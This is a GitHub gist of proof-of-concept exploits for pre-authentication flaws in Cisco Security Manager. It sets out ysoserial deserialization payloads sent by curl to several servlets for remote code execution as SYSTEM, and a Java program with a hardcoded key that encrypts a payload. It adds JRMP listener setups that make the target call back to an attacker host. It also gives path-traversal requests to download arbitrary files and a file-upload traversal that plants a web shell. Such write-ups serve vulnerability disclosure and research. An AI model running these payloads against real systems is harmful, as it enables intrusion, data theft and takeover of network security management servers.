Skip to content

Instantly share code, notes, and snippets.

@mirchr
Forked from Frycos/CSM_pocs.md
Created November 17, 2020 14:22
Show Gist options
  • Save mirchr/37caf1ba15e0418307213a55061fe18c to your computer and use it in GitHub Desktop.
Save mirchr/37caf1ba15e0418307213a55061fe18c to your computer and use it in GitHub Desktop.

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

Requirement: Download commons-beanutils-1.6.1.jar from central maven repository.

Remote Code Execution SecretService.jsp :-)

java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils

curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp

Remote Code Execution CsJaasServiceServlet

Compile JaasEncryptor.java and replace the b64Payload content:

import java.security.InvalidKeyException;
import java.util.Base64;
import com.cisco.nm.cmf.security.jaas.BlobCrypt;

public class JaasEncryptor {

	public static void main(String args[]) {
		String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";

		byte[] payload = Base64.getDecoder().decode(b64Payload);
		byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
		
		byte[] enc = BlobCrypt.encryptArray(payload, key);
		System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
		byte[] dec = BlobCrypt.decryptArray(enc, key);
	}
}

Prepare JRMP Listener:

java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443

java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0

Compile encrypted payload:

javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor

Send payload to Servlet with parameters cmd=data + new line + data=[ENCRYPTED_PAYLOAD].

Remote Code Execution AuthTokenServlet

Prepare JRMP Listener:

java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2

Send request:

curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet

Remote Code Execution ClientServicesServlet

Prepare JRMP listener:

java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3

Send request:

curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet

Remote Code Execution CTMServlet

java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2

curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'

Arbitrary File Download XdmConfigRequestHandler

GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]

Arbitrary File Download XdmResourceRequestHandler

GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta

Arbitrary File Upload XmpFileUploadServlet

Write a web shell e.g.

POST /cwhp/XmpFileUploadServlet?maxFileSize=100

Normal multi-part e.g. writing web shell in filename with ../../MDC/tomcat/webapps/cwhp/testme.jsp.

Arbitrary File Download XmpFileDownloadServlet

GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1

This will respond with a ZIP file containing all files from the directory.

Arbitrary File Download SampleFileDownloadServlet

GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]

This will respond with a ZIP file containing all files from the directory.

Arbitrary File Download resultsFrame.jsp

GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]

Remote Code Execution SecretServiceServlet

See also https://de.tenable.com/security/research/tra-2017-23

java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2

curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment